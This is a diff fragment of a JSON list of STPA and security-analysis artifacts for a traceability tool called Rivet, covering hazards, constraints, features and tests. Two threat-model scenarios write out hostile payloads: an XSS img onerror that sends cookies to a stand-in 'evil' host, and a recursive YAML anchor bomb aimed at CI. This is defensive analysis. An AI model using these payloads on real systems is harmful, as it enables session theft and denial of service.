+      "description": "\nA schema defines a conditional rule:\n\"when status == approved,\n\nverification-criteria is required.\" An artifact has status=draft\n\nand no verification-criteria field. The salsa database caches\n\nthe rule evaluation result as \"not applicable\" (because\n\nstatus != approved). The developer changes the artifact's status\n\nto \"approved\" but does not add verification-criteria. Because\n\nthe salsa conditional-rule query depends only on the rule\n\ndefinition (not the artifact's field values),\nthe cached \"not\n\napplicable\" result is returned [UCA-C-11]. The artifact passes\n\nvalidation despite missing the required field [H-1].\n",
+      "id": "LS-C-6",
+      "links": [
+        {
+          "target": "UCA-C-11",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Conditional rule evaluation uses cached field values",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "CC-I-2",
+      "links": [
+        {
+          "target": "CTRL-CI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-I-2",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-6",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The serve command must not expose artifact content on a network interface without an explicit authentication mechanism.  Acceptable mitigations include: binding to localhost-only by default, requiring a passphrase token, or delegating auth to a reverse proxy.  The default configuration must be secure: binding to 0.0.0.0 without authentication is not acceptable.\n",
+      "id": "SSC-3",
+      "links": [
+        {
+          "target": "SH-3",
+          "type": "prevents-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet's dashboard must not serve artifact data to unauthenticated clients",
+      "type": "sec-constraint"
+    },
+    {
+      "description": "\nCore WASM runtime does not validate that adapter-returned\n\nartifacts correspond to actual records in the source data.\n",
+      "id": "UCA-C-21",
+      "links": [
+        {
+          "target": "H-14",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nCore terminates validation after encountering the first error\n\ninstead of reporting all errors.\n",
+      "id": "UCA-C-9",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nReports and matrices are generated from data that has not passed\n\nvalidation — containing dangling links,\nschema violations,\nor\n\noutdated sync state.  Auditors receive misleading evidence.\n",
+      "id": "H-6",
+      "links": [
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet generates compliance reports from unverified traceability data",
+      "type": "hazard"
+    },
+    {
+      "description": "\nThe dashboard server (serve.rs) provides a reload endpoint that\n\nre-reads all artifact files,\nschemas,\nand documents from disk. If\n\nthe reload encounters a parse error in one YAML file,\nit may fail\n\nand leave the in-memory state unchanged without notifying the user.\n\nThe dashboard continues serving the pre-reload state while the\n\nuser believes they are viewing current data. In a worst-case\n\nenvironment where an engineer has just fixed a validation error\n\nand reloaded,\nthey see the old (passing) state and conclude\n\ntheir fix is working when it actually introduced a new error.\n",
+      "id": "H-16",
+      "links": [
+        {
+          "target": "L-1",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-3",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-4",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet dashboard serves stale data after hot-reload fails silently",
+      "type": "hazard"
+    },
+    {
+      "description": "Tests for the yaml_edit module (FEAT-061). Verifies indentation-aware YAML editing, comment preservation, multi-line string handling, list item insertion/removal, field value updates without reformatting adjacent content, and YAML 1.2.2 spec compliance for edge cases including anchors, tags, and flow collections.\n",
+      "id": "TEST-027",
+      "links": [
+        {
+          "target": "REQ-034",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "yaml",
+        "parsing",
+        "swe-4"
+      ],
+      "title": "yaml_edit lossless YAML editor tests",
+      "type": "feature"
+    },
+    {
+      "description": "New docs: embed-syntax, schemas-overview, schema/eu-ai-act, schema/safety-case, schema/stpa-ai, schema/stpa-sec, schema/research. Updated CLI and YAML references.\n",
+      "id": "FEAT-104",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Documentation refresh with 7 new topics",
+      "type": "feature"
+    },
+    {
+      "description": "Remove an artifact by ID from its YAML file. Pre-validates that no other artifacts link to the target (or --force to override with a warning listing affected links). Updates the link graph and reports any newly broken references. Refuses to remove artifacts that are targets of traceability rules unless --force.\n",
+      "id": "FEAT-054",
+      "links": [
+        {
+          "target": "REQ-031",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-2",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-028",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "mutation",
+        "phase-3"
+      ],
+      "title": "rivet remove — delete artifacts from CLI",
+      "type": "feature"
+    },
+    {
+      "description": "\nReport generation must be gated on a successful validation pass.\n\nIf validation has not been run or has failed,\nreport generation\n\nmust either fail or embed a prominent \"UNVERIFIED\" watermark.\n",
+      "id": "SC-6",
+      "links": [
+        {
+          "target": "H-6",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must generate compliance reports only from verified traceability data",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nThe Rocq metamodel specification or Verus annotations describe\n\nproperties of an idealized validation algorithm that differs from\n\nthe actual Rust implementation. Proofs pass but the implementation\n\nhas bugs that the proofs do not cover,\ncreating false assurance\n\nof correctness.\n",
+      "id": "H-12",
+      "links": [
+        {
+          "target": "L-2",
+          "type": "leads-to-loss"
+        },
+        {
+          "target": "L-5",
+          "type": "leads-to-loss"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet formal proofs verify a model that diverges from the implementation",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "UCA-VAR-002",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        },
+        {
+          "target": "H-VAR-002",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Core engine accepts variant configuration without running constraint solver",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe embed resolver receives live EmbedContext from the caller.\n\nIn serve mode,\nthis comes from the current AppState (which\n\nreloads on file changes). In export mode,\nit's computed fresh.\n",
+      "id": "SC-IMPL-004",
+      "links": [
+        {
+          "target": "H-IMPL-004",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Embed resolver MUST use current AppState, not cached data",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-C-6",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-6",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-4",
+          "type": "prevents"
+        },
+        {
+          "target": "H-2",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-C-15",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-15",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-11",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "HTML export includes rendered documents with resolved wiki-links and artifact embeds as static pages.\n",
+      "id": "REQ-035",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "export",
+        "documents"
+      ],
+      "title": "HTML export includes rendered documents with resolved embeds",
+      "type": "requirement"
+    },
+    {
+      "description": "OSLC server URLs are read from rivet.yaml.  If a supply-chain or insider attacker modifies rivet.yaml, Rivet's sync controller will send artifact data to and accept data from an attacker-controlled host. This enables both exfiltration (artifacts sent to attacker) and injection (attacker-controlled artifacts accepted as authoritative).\n",
+      "id": "SH-5",
+      "links": [
+        {
+          "target": "SL-1",
+          "type": "leads-to-sec-loss"
+        },
+        {
+          "target": "SL-5",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet's OSLC sync channel can be redirected to an attacker-controlled server",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "Provide a CLI binary for validation, querying, and reporting. Support an HTTP serve mode (axum + HTMX) for dashboard visualization. No Tauri or desktop GUI.\n",
+      "id": "REQ-007",
+      "links": [
+        {
+          "target": "SC-18",
+          "type": "satisfies"
+        },
+        {
+          "target": "SC-18",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-22",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-IMPL-003",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-L-1",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-L-2",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-L-3",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-L-4",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-L-5",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-D-1",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-D-2",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-D-4",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-C-27",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-M-1",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-M-2",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "CC-M-3",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "core",
+        "ui"
+      ],
+      "title": "CLI and serve pattern",
+      "type": "requirement"
+    },
+    {
+      "description": "The OSLC sync controller provides sync operations to any URL specified in rivet.yaml without checking it against an operator-defined allowlist.\n",
+      "id": "SUCA-OSLC-1",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "issued-by"
+        },
+        {
+          "target": "SH-5",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "OSLC sync controller does not validate server URL against an allowlist",
+      "type": "sec-uca"
+    },
+    {
+      "description": "\nDeveloper runs `rivet validate` in a workspace where rivet.yaml\n\nlists three source directories,\nbut one directory is on a network\n\nmount that is temporarily unavailable.  Core's process model marks\n\ntwo sources as loaded but does not track that the third failed to\n\nload.  Validation proceeds with only two sources [UCA-C-7],\n\nreporting links to the third source as dangling when they are\n\nactually valid but unreachable.  Worse,\nif the third source\n\ncontains new artifacts that satisfy previously-dangling links,\n\nthose links remain flagged as broken,\neroding trust in the\n\nvalidation output.\n",
+      "id": "LS-C-4",
+      "links": [
+        {
+          "target": "UCA-C-7",
+          "type": "caused-by-uca"
+        },
+        {
+          "target": "H-1",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Partial source loading during incremental validation",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nAn artifact originally typed as \"requirement\" is reclassified as\n\n\"information\"\nin the external tool,\nbut Rivet still treats the\n\nlink as a requirement-level trace.\n",
+      "id": "H-1.3",
+      "links": [
+        {
+          "target": "H-1",
+          "type": "refines"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet permits links to artifacts whose type has changed",
+      "type": "sub-hazard"
+    },
+    {
+      "description": "Traceability rule enforcement is gated on artifact status. Draft artifacts get info-level diagnostics for missing links; active and approved artifacts get errors. The schema defines which statuses enforce traceability via \"enforce-links-for-status\" (default: [\"active\", \"approved\"]). This separates \"not yet done\" from \"structurally broken\" without requiring a separate completeness field or workflow state machine.\n",
+      "id": "DD-040",
+      "links": [
+        {
+          "target": "REQ-039",
+          "type": "satisfies"
+        },
+        {
+          "target": "FEAT-070",
+          "type": "implements"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "validation",
+        "workflow",
+        "architecture"
+      ],
+      "title": "Status-driven traceability enforcement",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-C-5",
+      "links": [
+        {
+          "target": "CTRL-CORE",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-C-5",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-6",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nAny read-modify-write operation (rivet add,\nrivet mutate) must\n\npreserve all existing content,\ncomments,\nand formatting. Only the\n\nspecific insertion or modification should differ. Verified by the\n\nrowan round-trip test suite (66 files,\n83 edge cases).\n",
+      "id": "SC-24",
+      "links": [
+        {
+          "target": "H-24",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet must preserve YAML content byte-for-byte during round-trip operations",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Create a new artifact from the command line with schema validation. Auto-generates next available ID for the given type/prefix pattern. Validates type exists in schema, required fields are present, status is in allowed values. Appends to the appropriate YAML file based on artifact type. Supports --type, --title, --status, --tags, --field, and --description flags. Interactive mode prompts for required fields.\n",
+      "id": "FEAT-052",
+      "links": [
+        {
+          "target": "REQ-031",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-028",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "cli",
+        "mutation",
+        "phase-3"
+      ],
+      "title": "rivet add — create artifacts from CLI",
+      "type": "feature"
+    },
+    {
+      "description": "Conditional validation rules are expressed directly in schema YAML using a when/then syntax, rather than using an external rule engine (OPA, Drools) or embedding Lua/WASM scripting.\n",
+      "id": "DD-018",
+      "links": [
+        {
+          "target": "REQ-023",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "validation",
+        "schema"
+      ],
+      "title": "Schema-embedded conditional rules over external rule engine",
+      "type": "design-decision"
+    },
+    {
+      "description": "Criterion benchmarks for core operations (store, link graph, validation, matrix) at multiple artifact scales (100, 1000, 10000). Results serve as performance KPI baselines and regression detection.\n",
+      "id": "REQ-013",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "performance"
+      ],
+      "title": "Performance benchmarks with KPI baselines",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAn AI agent invokes rivet_validate via MCP,\nreceives PASS with\n\n0 errors. The agent then modifies an artifact YAML file,\nintroducing\n\na broken link. The agent invokes rivet_validate again but the MCP\n\nserver returns cached results from the previous call. The agent\n\nsees PASS,\nconcludes the change is valid,\nand commits. The broken\n\nlink reaches the main branch.\n",
+      "id": "LS-M-1",
+      "links": [
+        {
+          "target": "H-21",
+          "type": "leads-to-hazard"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "MCP agent commits based on stale validation results",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "CC-O-3",
+      "links": [
+        {
+          "target": "CTRL-OSLC",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-O-3",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-2",
+          "type": "prevents"
+        },
+        {
+          "target": "H-1",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The on-disk YAML artifact store lacks mandatory access controls, and Rivet does not verify store integrity before serving data.  An insider or process with filesystem write access can modify artifacts silently. Rivet reads from the store trusting it is authoritative, propagating the modification into validation results and compliance reports.\n",
+      "id": "SH-2",
+      "links": [
+        {
+          "target": "SL-2",
+          "type": "leads-to-sec-loss"
+        },
+        {
+          "target": "SL-4",
+          "type": "leads-to-sec-loss"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Rivet's artifact store can be modified without authorization or audit trail",
+      "type": "sec-hazard"
+    },
+    {
+      "description": "Schemas are YAML files that can be merged (common + stpa, common + aspice). Each schema file defines artifact types, link types, and traceability rules.\n",
+      "id": "DD-003",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-003",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "architecture",
+        "schema"
+      ],
+      "title": "Mergeable YAML schemas",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-L-3",
+      "links": [
+        {
+          "target": "CTRL-CLI",
+          "type": "constrains-controller"
+        },
+        {
+          "target": "UCA-L-3",
+          "type": "inverts-uca"
+        },
+        {
+          "target": "H-5",
+          "type": "prevents"
+        },
+        {
+          "target": "H-3",
+          "type": "prevents"
+        },
+        {
+          "target": "H-7",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nArtifact data residing in external tools (Polarion,\nDOORS,\n\ncodebeamer,\nStrictDoc) accessed via OSLC or ReqIF.  Rivet does\n\nnot control this data directly — it observes and syncs.\n",
+      "id": "PROC-EXTERNAL",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "External ALM Tool Data",
+      "type": "controlled-process"
+    },
+    {
+      "description": "Detects AI agent retry loops by fingerprinting validation failures across runs. Escalates from Normal to ExpandedContext to DifferentApproach to HumanReview.\n",
+      "id": "FEAT-081",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "Agent convergence tracking via failure signatures",
+      "type": "feature"
+    },
+    {
+      "description": "\nParser does not emit a diagnostic when encountering unsupported\n\nStarlark constructs,\nsilently skipping them.\n",
+      "id": "UCA-C-16",
+      "links": [
+        {
+          "target": "H-11",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Tests for CLI mutation commands (FEAT-052 through FEAT-056). Verifies rivet add with auto-ID generation and schema validation, rivet modify with field/status/tag updates, rivet remove with dangling link prevention, rivet link/unlink with cardinality constraint checks, and rivet next-id computation for all prefix patterns.\n",
+      "id": "TEST-025",
+      "links": [
+        {
+          "target": "REQ-031",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "cli",
+        "mutation",
+        "swe-5"
+      ],
+      "title": "CLI mutation commands (add/modify/remove/link/unlink) tests",
+      "type": "feature"
+    },
+    {
+      "description": "New artifact kind \"feature-binding\" that maps features to artifact IDs and source file glob patterns. Validation detects unbound features, unbound artifacts, stale bindings (deleted artifacts, non-existent paths), and binding conflicts (same artifact bound to mutually exclusive features). Approximately 200 lines.\n",
+      "id": "FEAT-112",
+      "links": [
+        {
+          "target": "REQ-044",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-050",
+          "type": "implements"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "ple",
+        "binding",
+        "phase-3"
+      ],
+      "title": "Binding model for feature-to-artifact mapping",
+      "type": "feature"
+    },
+    {
+      "description": "Tests for link graph construction, backlink computation, orphan detection, reachability queries, and traceability matrix computation. Includes coverage module tests for full, partial, and vacuous coverage scenarios.\n",
+      "id": "TEST-004",
+      "links": [
+        {
+          "target": "REQ-004",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "validation",
+        "swe-5"
+      ],
+      "title": "Link graph and coverage tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nCore evaluates conditional rules before schema loading completes,\n\nusing an incomplete rule set.\n",
+      "id": "UCA-C-14",
+      "links": [
+        {
+          "target": "H-9",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-10",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe MCP server must detect when artifact files have changed on disk\n\nsince the last tool invocation and reload project state before\n\nreturning results. Alternatively,\nthe server must provide an explicit\n\nreload mechanism and document that results may be stale.\n",
+      "id": "SC-23",
+      "links": [
+        {
+          "target": "H-21",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Rivet MCP server must not return stale data after disk changes",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Load and execute WASM component adapters at runtime using the WIT-defined interface.\n",
+      "id": "FEAT-012",
+      "links": [
+        {
+          "target": "REQ-008",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-004",
+          "type": "implements"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "wasm",
+        "extensibility",
+        "phase-3"
+      ],
+      "title": "WASM adapter runtime",
+      "type": "feature"
+    },
+    {
+      "description": "15 artifact types mapping to EU AI Act Annex IV and Articles 9-15. 14 link types, 12 traceability rules. Bridge schemas for STPA and ASPICE composition. Init preset and example project.\n",
+      "id": "FEAT-088",
+      "links": [
+        {
+          "target": "REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "EU AI Act compliance schema with Annex IV mapping",
+      "type": "feature"
+    },
+    {
+      "description": "Compile s-expression quantifiers (forall, exists) and graph traversal (reachable-from, reachable-to, path) into Datalog relations. Implement semi-naive evaluation with fixpoint iteration for transitive closure. Integrate with salsa for incremental re-evaluation. Approximately 500 lines. Unlocks s-expression-based traceability rules in schemas.\n",
+      "id": "FEAT-109",
+      "links": [
+        {
+          "target": "REQ-041",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-049",
+          "type": "implements"
+        },
+        {
+          "target": "DD-051",
+          "type": "implements"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "s-expression",
+        "datalog",
+        "evaluator",
+        "phase-2"
+      ],
+      "title": "Datalog compiler and semi-naive evaluator",
+      "type": "feature"
+    },
+    {
+      "description": "\nCore computes coverage metrics that count dangling links as\n\nsatisfied trace relationships.\n",
+      "id": "UCA-C-5",
+      "links": [
+        {
+          "target": "H-3",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "H-6",
+          "type": "leads-to-hazard"
+        },
+        {
+          "target": "CTRL-CORE",
+          "type": "issued-by"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "",
+      "type": "uca"
+    },
+    {
+      "description": "Change impact is computed by content-hashing each artifact (title + description + fields + links), diffing hashes against a baseline, and walking the petgraph link graph from changed nodes to find transitively affected artifacts. No separate change-tracking database.\n",
+      "id": "DD-019",
+      "links": [
+        {
+          "target": "REQ-024",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "traceability",
+        "baseline"
+      ],
+      "title": "Content hashing with graph traversal for impact analysis",
+      "type": "design-decision"
+    },
+    {
+      "description": "An insider commits a YAML artifact with the description:\n  \"Verified by <img src=x onerror='fetch(\\\"//evil/x?c=\\\"+document.cookie)'>\"\nRivet's dashboard renders the description without HTML escaping. Any safety engineer who navigates to that artifact in their browser executes the attacker's JavaScript, leaking their session context. In a single-page-app context, the attacker can also read other artifacts rendered on the same page.\n",
+      "id": "SLS-3",
+      "links": [
+        {
+          "target": "SUCA-DASH-2",
+          "type": "caused-by-sec-uca"
+        },
+        {
+          "target": "SH-4",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "XSS via crafted artifact description in dashboard",
+      "type": "sec-scenario"
+    },
+    {
+      "description": "Walks rowan CST to extract Vec<SpannedArtifact> with byte-accurate spans for every field. Cross-validated against serde-based parser.\n",
+      "id": "FEAT-094",
+      "links": [
+        {
+          "target": "REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "HIR extraction from rowan CST (Phase 2)",
+      "type": "feature"
+    },
+    {
+      "description": "Solve feature model constraints to validate and propagate variant configurations. Given a set of selected features, propagate implications (implies, requires), detect conflicts (excludes, alternative group violations), and derive the effective feature set. Report clear diagnostics for invalid configurations. Approximately 400 lines using boolean constraint propagation (BCP).\n",
+      "id": "FEAT-111",
+      "links": [
+        {
+          "target": "REQ-043",
+          "type": "satisfies"
+        },
+        {
+          "target": "DD-049",
+          "type": "implements"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "ple",
+        "constraint-solver",
+        "phase-3"
+      ],
+      "title": "Propositional constraint solver for variant configurations",
+      "type": "feature"
+    },
+    {
+      "description": "Integration tests for the HTML export pipeline: document pages are generated in docs/ subdirectory, wiki-links resolve to static .html hrefs, artifact embeds render inline, and the export directory contains the expected file structure. Verifies REQ-035 static document rendering and REQ-036 config.js version switcher stub.\n",
+      "id": "TEST-015",
+      "links": [
+        {
+          "target": "REQ-035",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-036",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "export",
+        "documents",
+        "swe-5"
+      ],
+      "title": "HTML export document page tests",
+      "type": "feature"
+    },
+    {
+      "description": "A supply-chain attacker opens a pull request that adds a crafted YAML file to the artifacts/ directory:\n  deeply_nested: &a [*a, *a, *a, *a, *a, *a, *a, *a, *a, *a]\nThe CI pipeline runs 'rivet validate' on every PR.  YAML parsing expands the anchor recursively, consuming all available memory and causing the CI runner to OOM-kill the rivet process (or timeout). The pipeline is blocked for the duration of the attacker's PR. If the attacker submits multiple PRs simultaneously, all CI capacity is consumed.\n",
+      "id": "SLS-5",
+      "links": [
+        {
+          "target": "SUCA-CORE-1",
+          "type": "caused-by-sec-uca"
+        },
+        {
+          "target": "SH-6",
+          "type": "leads-to-sec-hazard"
+        }
+      ],
+      "status": "approved",
+      "tags": [],
+      "title": "YAML bomb in CI — supply-chain attacker causes pipeline DoS",
+      "type": "sec-scenario"
+    },
+    {
+      "description": "Transform SysML v2 system architecture models into AADL execution platform models. Maps SysML v2 parts/ports to AADL components/features, SysML v2 allocations to AADL bindings, and SysML v2 timing constraints to AADL properties. Based on SEI's SysML v2 + AADL mapping rules.\n",
+      "id": "FEAT-068",
+      "links": [
+        {
+          "target": "REQ-038",
+          "type": "satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "sysml",
+        "aadl",
+        "lowering",
+        "future"
+      ],
+      "title": "SysML v2 to AADL model lowering",
+      "type": "feature"
+    },
+    {
+      "description": "The system must validate traceability and coverage independently for each variant configuration. Given a variant, the system derives the effective feature set, collects all bound artifacts, and validates that traceability chains are complete within that subset. Coverage reports must be per-variant. An --all-variants mode must validate every defined variant independently and report per-variant results. A variant that passes validation when the union of all artifacts passes must still fail if its own subset has broken traceability.\n",
+      "id": "REQ-045",
+      "links": [
+        {
+          "target": "SC-VAR-001",
+          "type": "constraint-satisfies"
+        },
+        {
+          "target": "SC-VAR-007",
+          "type": "constraint-satisfies"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "variant",
+        "validation",
+        "coverage"
+      ],
+      "title": "Per-variant validation and coverage",
+      "type": "requirement"
+    },
+    {
+      "description": "Import AADL architecture models via spar CLI JSON output rather than parsing AADL directly. The JSON interchange format provides a clean boundary between spar and rivet, avoiding tight coupling to spar's internal salsa/rowan state.\n",
+      "id": "DD-033",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "adapter",
+        "aadl",
+        "architecture"
+      ],
+      "title": "spar CLI JSON bridge for AADL import",
+      "type": "design-decision"
+    },
+    {
+      "description": "Five unit tests for the diff module verifying empty diff, identical stores, added artifacts, removed artifacts, and modified artifact detection including title, status, tags, links, and fields changes.\n",
+      "id": "TEST-008",
+      "links": [
+        {
+          "target": "REQ-001",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "diff",
+        "swe-4"
+      ],
+      "title": "Diff module tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe failure signature includes severity,\nrule,\nartifact_id,\n\nand message hash. All four components must be present to\n\nminimize hash collisions. The 64-bit FNV-1a hash space\n\nmakes collisions negligible for practical diagnostic counts.\n",
+      "id": "SC-IMPL-006",
+      "links": [
+        {
+          "target": "H-IMPL-006",
+          "type": "prevents"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Convergence signature MUST include all diagnostic fields",
+      "type": "system-constraint"
